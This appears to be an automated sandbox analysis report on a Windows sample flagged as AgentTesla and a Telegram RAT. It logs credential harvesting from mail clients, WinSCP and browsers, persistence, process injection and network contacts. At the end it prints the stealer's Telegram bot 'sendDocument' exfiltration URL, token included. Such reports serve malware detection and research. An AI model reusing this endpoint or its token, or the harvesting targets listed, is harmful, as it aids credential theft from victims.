Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0123F53C GetUserNameW, 4_2_0123F53C

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830902 Sample: file.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 51 api4.ipify.org 2->51 53 api.telegram.org 2->53 55 api.ipify.org 2->55 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Telegram RAT 2->69 71 5 other signatures 2->71 8 file.exe 1 8 2->8         started        12 Qasvjoldkyh.exe 4 2->12         started        14 kDPmkTm.exe 4 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 45 C:\Users\user\AppData\...\Qasvjoldkyh.exe, PE32 8->45 dropped 47 C:\Users\...\Qasvjoldkyh.exe:Zone.Identifier, ASCII 8->47 dropped 49 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 8->49 dropped 85 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->85 87 May check the online IP address of the machine 8->87 89 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->89 91 Creates multiple autostart registry keys 8->91 18 file.exe 17 5 8->18         started        23 powershell.exe 15 8->23         started        25 file.exe 8->25         started        93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 97 Encrypted powershell cmdline option found 12->97 27 Qasvjoldkyh.exe 12->27         started        29 powershell.exe 12->29         started        99 Injects a PE file into a foreign processes 14->99 31 powershell.exe 14->31         started        33 kDPmkTm.exe 14->33         started        signatures6 process7 dnsIp8 57 api4.ipify.org 104.237.62.211, 443, 49697, 49700 WEBNXUS United States 18->57 59 api.telegram.org 149.154.167.220, 443, 49698, 49702 TELEGRAMRU United Kingdom 18->59 63 2 other IPs or domains 18->63 41 C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 18->41 dropped 43 C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII 18->43 dropped 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->73 75 Tries to steal Mail credentials (via file / registry access) 18->75 77 Creates multiple autostart registry keys 18->77 35 conhost.exe 23->35         started        61 api.ipify.org 27->61 79 Tries to harvest and steal browser information (history, passwords, etc) 27->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->81 83 Installs a global keyboard hook 27->83 37 conhost.exe 29->37         started        39 conhost.exe 31->39         started        file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.237.62.211
 api4.ipify.org United States
18450 WEBNXUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
api4.ipify.org 104.237.62.211 true
api.telegram.org 149.154.167.220 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument false
      		high